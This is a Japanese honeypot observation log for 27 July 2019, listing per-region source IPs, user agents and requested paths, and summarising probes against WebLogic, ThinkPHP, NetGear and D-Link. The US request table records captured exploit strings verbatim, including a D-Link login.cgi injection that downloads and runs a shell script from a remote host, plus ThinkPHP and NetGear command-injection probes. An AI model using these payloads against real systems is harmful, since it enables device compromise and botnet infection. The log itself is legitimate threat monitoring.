ハニーポット(仮) 観測記録 2019/07/27分です。
APでは
Oracle WebLogicの脆弱性を狙うアクセス
を確認しました。
USでは
ThinkPHPの脆弱性を狙うアクセス
NetGearの脆弱性を狙うアクセス
D-Linkの脆弱性を狙うアクセス
Hakai/2.0によるスキャン行為
を確認しました。
どのRegionにおいても
CERNstats(https://home.cern/)によるスキャン行為
を確認しました。
アクセス数推移
AP:総アクセス数:21 (前日比:-2)
US:総アクセス数:23 (前日比:+14)
EU:総アクセス数:3 (前日比:-16)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 115.159.186.223 | China |
1 | 13.229.76.34 | Singapore |
3 | 185.53.88.40 | Estonia |
2 | 211.144.131.148 | China |
2 | 39.106.146.60 | China |
1 | 45.33.19.168 | United States |
1 | 78.128.113.18 | Bulgaria |
4 | 88.248.119.245 | Turkey |
5 | 89.74.240.156 | Poland |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
2 | CERNstats/1.0 (https://www.cern.ch) |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | CONNECT | 45[.]79[.]32[.]208:60606 | HTTP/1.1 |
2 | GET | /.env | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
2 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
2 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
2 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
2 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
2 | HEAD | /robots.txt | HTTP/1.1 |
1 | POST | /wls-wsat/CoordinatorPortType | HTTP/1.1 |
2 | PROPFIND | / | HTTP/1.1 |
1 | \x03 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 13.229.76.34 | Singapore |
2 | 185.53.88.40 | Estonia |
1 | 210.60.110.4 | Taiwan |
1 | 211.144.131.148 | China |
3 | 27.115.124.6 | China |
1 | 27.115.124.70 | China |
10 | 58.217.107.82 | China |
1 | 61.219.11.153 | Taiwan |
1 | 76.31.234.2 | United States |
1 | 78.128.113.18 | Bulgaria |
1 | 89.175.139.132 | Russia |
UserAgent一覧
件数 | UserAgent |
---|---|
4 | - |
1 | CERNstats/1.0 (https://www.cern.ch) |
1 | Go-http-client/1.1 |
1 | Hakai/2.0 |
1 | Mozilla/5.0 |
2 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
4 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /.env | HTTP/1.0 |
1 | GET | /evox/about | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://104[.]248[.]93[.]159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
2 | GET | /manager/html | HTTP/1.1 |
1 | GET | /nmaplowercheck1564130459 | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | \x03 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 172.104.242.173 | United States |
1 | 210.60.110.4 | Taiwan |
1 | 211.144.131.148 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
1 | - |
1 | CERNstats/1.0 (https://www.cern.ch) |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /.env | HTTP/1.0 |
1 | GET | /manager/html | HTTP/1.1 |